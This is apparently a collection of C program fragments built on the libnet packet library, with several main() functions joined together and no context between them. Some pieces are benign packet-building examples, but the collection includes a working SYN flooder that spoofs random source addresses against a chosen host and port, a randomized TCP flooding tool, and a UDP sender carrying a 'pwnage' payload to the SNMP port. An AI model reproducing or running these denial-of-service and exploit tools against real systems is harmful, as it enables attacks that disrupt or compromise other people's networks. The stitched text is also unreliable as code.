* link-layer API, so this time we need memory for a ethernet header
* as well as memory for the ICMP and IP headers and our payload.
*/
packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_UDP_H + payload_size;
/*
* Step 2: Memory Initialization (interchangable with step 1).
*/
if (libnet_init_packet(packet_size, &packet) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
}
/*
* Step 3: Packet construction (ethernet header).
*/
libnet_build_ethernet(enet_dst,
enet_src,
ETHERTYPE_IP,
NULL,
0,
packet);
/*
* Step 3: Packet construction (IP header).
*/
libnet_build_ip(LIBNET_UDP_H + payload_size,
0, /* IP tos */
242, /* IP ID */
0, /* Frag */
64, /* TTL */
IPPROTO_UDP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
packet + LIBNET_ETH_H); /* Packet header memory */
while (libnet_plist_chain_next_pair(plist_p, &bport, &eport))
{
while (!(bport > eport) && bport != 0)
{
cport = bport++;
/*
* Step 3: Packet construction (UDP header).
*/
libnet_build_udp(242, /* source port */
cport, /* dest. port */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_ETH_H + LIBNET_IP_H);
/*
* Step 4: Packet checksums (ICMP header *AND* IP header).
*/
if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
/*
* Step 5: Packet injection.
*/
c = libnet_write_link_layer(network, device, packet, packet_size);
if (c < packet_size)
{
libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c);
}
else
{
printf("construction and injection completed, wrote all %d bytes, port %d\n", c, cport);
}
}
}
/*
* Shut down the interface.
*/
if (libnet_close_link_interface(network) == -1)
{
libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface");
}
/*
* Free packet memory.
*/
libnet_destroy_packet(&packet);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
int sock, c;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char *cp, *buf;
u_char *payload = "hello world";
u_char *options = " This here is a 40-byte IP option list.";
int payload_s = strlen(payload);
int option_s = strlen(options);
struct ipoption ipopt;
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
printf("IP + options and TCP + payload packet building/writing test\n");
while((c = getopt(argc, argv, "d:s:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if (!(dst_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if (!(src_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* Get packet memory. Let's get plenty.
*/
buf = malloc(IP_MAXPACKET);
if (!buf)
{
perror("No memory for packet");
exit(EXIT_FAILURE);
}
/*
* Open our raw IP socket and set IP_HDRINCL.
*/
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1)
{
perror("No socket");
exit(EXIT_FAILURE);
}
/*
* Build the IP header (shown exploded for commenting).
*/
libnet_build_ip(LIBNET_TCP_H + payload_s,/* Size of the payload */
0, /* IP tos */
242, /* IP ID */
0, /* Frag stuff */
48, /* TTL */
IPPROTO_TCP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
buf); /* Packet header memory */
/*
* Build the TCP header.
*/
libnet_build_tcp(src_prt, /* Source TCP port */
dst_prt, /* Destination TCP port */
11111, /* Sequence number */
99999, /* Acknowledgement number */
TH_SYN|TH_ACK, /* Control flags */
1024, /* Window size */
0, /* Urgent pointer */
payload, /* Pointer to payload */
payload_s,
buf + LIBNET_IP_H); /* Packet header memory */
/*
* Calculate the TCP header checksum (IP header checksum is *always* done
* by the kernel.
*/
libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H + payload_s);
memcpy(ipopt.ipopt_list, options, option_s);
*(ipopt.ipopt_list) = IPOPT_SECURITY;
*(ipopt.ipopt_list + 1) = 1;
/*
* Insert the IP options.
*/
c = libnet_insert_ipo(&ipopt, /* pointer to ipopt struct */
option_s, /* Length of option list */
buf); /* Packet header memory */
if (c == -1)
{
fprintf(stderr, "Can't add options, discarding them.\n");
}
/*
* Write the packet to the network.
*/
c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H + payload_s
+ option_s);
if (c < LIBNET_TCP_H + LIBNET_IP_H + payload_s + option_s)
{
fprintf(stderr, "libnet_write_ip: %s\n", strerror(errno));
}
printf("Completed, wrote %d bytes\n", c);
free(buf);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
int sock, n, c, r, p_num;
struct libnet_arena arena, *arena_p;
u_char *packets[10];
u_char *payload;
u_char *buf;
u_long src_ip, dst_ip;
src_ip = 0;
dst_ip = 0;
payload = NULL;
while((c = getopt(argc, argv, "d:s:p:")) != EOF)
{
switch (c)
{
case 'd':
if (!(dst_ip = libnet_name_resolve(optarg, 1))) {
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 's':
if (!(src_ip = libnet_name_resolve(optarg, 1))) {
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(-1);
}
break;
case 'p':
payload = optarg;
break;
default:
usage();
exit(-1);
}
}
if (!src_ip || !dst_ip || !payload) {
usage();
exit(-1);
}
/* allocate packet memory */
buf = (u_char *)malloc(LIBNET_IP_H + LIBNET_ICMP_H + strlen(payload));
if(!buf) {
perror("malloc:");
exit(-1);
}
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror("No socket");
exit(-1);
}
/* build headers */
libnet_build_ip(LIBNET_ICMP_ECHO_H, IPTOS_LOWDELAY | IPTOS_THROUGHPUT,
TPING_ID, 0, TPING_TTL, IPPROTO_ICMP, src_ip, dst_ip, NULL, 0, buf);
libnet_build_icmp_echo(ICMP_ECHO, 0, TPING_ID, 1, payload,strlen(payload),
buf + LIBNET_IP_H);
if (libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H) < 0) {
fprintf(stderr, "Can't do checksum!\n");
}
/*
* Write the packet to the network.
*/
r = libnet_write_ip(sock, buf, LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload));
if (r < LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload)) {
fprintf(stderr, "Unable to send packet.\n");
}
printf("ICMP Echo sent. Payload: %s\n",payload);
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host
dest_port = (u_short) atoi(argv[2]); // the port
network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // allocate memory for packet
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // seed the random number generator
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // transport protocol
libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
dest_ip, // destination IP
NULL, // payload (none)
0, // payload length
packet); // packet header memory
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
dest_port, // destination TCP port
libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
TH_SYN, // control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // window size (randomized)
0, // urgent pointer
NULL, // payload (none)
0, // payload length
packet + LIBNET_IP_H); // packet header memory
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // inject packet
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds
}
libnet_destroy_packet(&packet); // free packet memory
if (libnet_close_raw_sock(network) == -1) // close the network interface
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
struct iovec *
tcp_raw_input(struct libnet_ip_hdr *ip, struct libnet_tcp_hdr *tcp, int len)
{
struct tha tha;
struct tcp_conn *conn;
struct tcp_seg seg;
struct iovec *iov;
u_short cksum;
u_char *buf;
int tcp_hl = tcp->th_off * 4;
/* Verify TCP checksum. */
cksum = tcp->th_sum;
libnet_do_checksum((u_char *) ip, IPPROTO_TCP, len);
if (cksum != tcp->th_sum)
return (NULL);
tha.src = ip->ip_src.s_addr;
tha.dst = ip->ip_dst.s_addr;
tha.port = ntohs(tcp->th_sport) << 16 | ntohs(tcp->th_dport);
buf = (u_char *)tcp + tcp_hl;
len -= tcp_hl;
iov = NULL;
/* Find half-duplex stream associated with this segment. */
for (conn = &conntab[tha.port % TCP_HASHSIZE];
conn->next != NULL; conn = conn->next) {
if (memcmp((char *)&tha, (char *)&conn->tha, sizeof(tha)) == 0)
break;
}
/* Process by TCP flags. */
if (conn->next == NULL) {
if (tcp->th_flags & TH_SYN) {
if (conn->next == NULL &&
(conn->next = (struct tcp_conn *)
calloc(1, sizeof(*conn))) == NULL) {
err(1, "tcp_raw_input: calloc");
}
conn->tha = tha;
if (conn->seg == NULL &&
(conn->seg = (struct tcp_seg *)
malloc(sizeof(seg) * 128)) == NULL) {
err(1, "tcp_raw_input: malloc");
}
conn->segmax = 128;
}
}
else if (tcp->th_flags & TH_FIN || tcp->th_flags & TH_RST) {
iov = tcp_raw_reassemble(conn, 1);
}
else if (tcp->th_flags & TH_ACK && len > 0) {
seg.seq = ntohl(tcp->th_seq);
if (bsearch(&seg, conn->seg, conn->segcnt,
sizeof(seg), tcp_seg_compare) == NULL) {
if ((seg.data = (u_char *) malloc(len)) == NULL)
err(1, "tcp_raw_input: malloc");
memcpy(seg.data, buf, len);
seg.len = len;
if (conn->segcnt == conn->segmax) {
if ((conn->seg = (struct tcp_seg *)
realloc(conn->seg, (conn->segmax * 2) *
sizeof(seg))) == NULL)
err(1, "tcp_raw_input: realloc");
conn->segmax *= 2;
}
conn->seg[conn->segcnt++] = seg;
iov = tcp_raw_reassemble(conn, Opt_snaplen);
}
}
conn->mtime = time(NULL);
/* If we successfully reassembled the stream, delete its entry. */
if (iov != NULL) {
tcp_raw_delete(conn);
}
return (iov);
}
int
main (int argc, char *argv[])
{
int i, loop;
/* no payload yet */
int size = LIBNET_PACKET;
opt.seqn = opt.ackn = opt.flags = 0;
opt.dport = opt.sport = opt.frag = 0;
opt.ttl = 255;
opt.winsize = 16384;
opt.tos = 0x08;
signal (SIGINT, (void (*)()) abort);
srand (time (NULL) + getpid ());
srandom (time (NULL) + getpid ());
banner ();
parse_args (argc, argv);
if (!whocares)
{
if (!local)
{
if (!(opt.dst = libnet_name_resolve (dsthost, LIBNET_RESOLVE)))
{
libnet_error (LIBNET_ERR_FATAL,
":: invalid destination IP address: %s\n", dsthost);
exit (1);
}
printf (":: destination host - %s\n", dsthost);
}
else
printf (":: destination host - local\n");
}
else
printf (":: destination host - whocares\n");
printf (":: destination port(s)");
for (i = 1; i < ports + 1; i++)
printf (" - %d", portarray[i]);
printf ("\n");
if (libnet_init_packet (size, &packet) == NULL)
{
libnet_error (LIBNET_ERR_FATAL,
":: libnet_init_packet failed\n");
}
if ((s = libnet_open_raw_sock (IPPROTO_RAW)) == -1)
{
libnet_error (LIBNET_ERR_FATAL, ":: cannot open socket.\n");
}
printf (":: spanking...\n");
printf (":: press ^C to end...\n");
for (;;)
{
for (i = 1; i < ports + 1; i++)
{
if (whocares)
change2 = random () & 01;
if (ismult)
{
opt.src = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
if (local)
opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
else
{
if (change2)
opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
else
opt.dst = rand ();
}
}
else
{
opt.src = rand ();
if (local)
opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
else
{
if (change2)
opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
else
opt.dst = rand ();
}
}
if (isrand)
{
loop = rand () % 5;
for (i = 0; i <= loop; i++)
opt.flags |= flag_array[rand () % 5];
opt.frag = frag_array[rand () % 3];
opt.ackn = random ();
opt.sport = 1024 + rand () % 32000;
opt.tos = tos_array[rand () % 3];
opt.ttl = rand () % 255;
opt.winsize = rand () % 32000;
if (change)
ismult = random () & 01;
}
opt.ident = random ();
opt.seqn = random ();
if (!stream)
opt.ackn = random ();
if (portarray[i] == 0)
opt.dport = rand () % 1024;
else
opt.dport = portarray[i];
libnet_build_ip (TCP_H, opt.tos, opt.ident, opt.frag, opt.ttl, IPPROTO_TCP, opt.src, opt.dst, NULL, 0, packet);
libnet_build_tcp (opt.sport, opt.dport, opt.seqn, opt.ackn, opt.flags, opt.winsize, 0, NULL, 0, packet + IP_H);
if (libnet_do_checksum (packet, IPPROTO_TCP, TCP_H) == -1)
{
libnet_error (LIBNET_ERR_FATAL, ":: libnet_do_checksum failed\n");
}
libnet_write_ip (s, packet, size);
}
}
return 1;
}
int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct udphdr *UDP;
u_int32_t src = 0, dst = 0;
banner();
if (argc < 3) usage(argv[0]);
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
exit(-1);
}
if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved source address.\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved destination address.\n");
exit(-1);
}
if ((buf = malloc(IP_MAXPACKET)) == NULL) {
perror("malloc");
exit(-1);
}
UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);
packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1;
srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5; /* header length */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_UDP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;
UDP->uh_sport = rand();
UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
UDP->uh_sum = 0;
memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1);
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H);
if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l));
exit(-1);
}
printf("[+] Packet sent.\n");
libnet_destroy(l);
free(buf);
return (0);
}
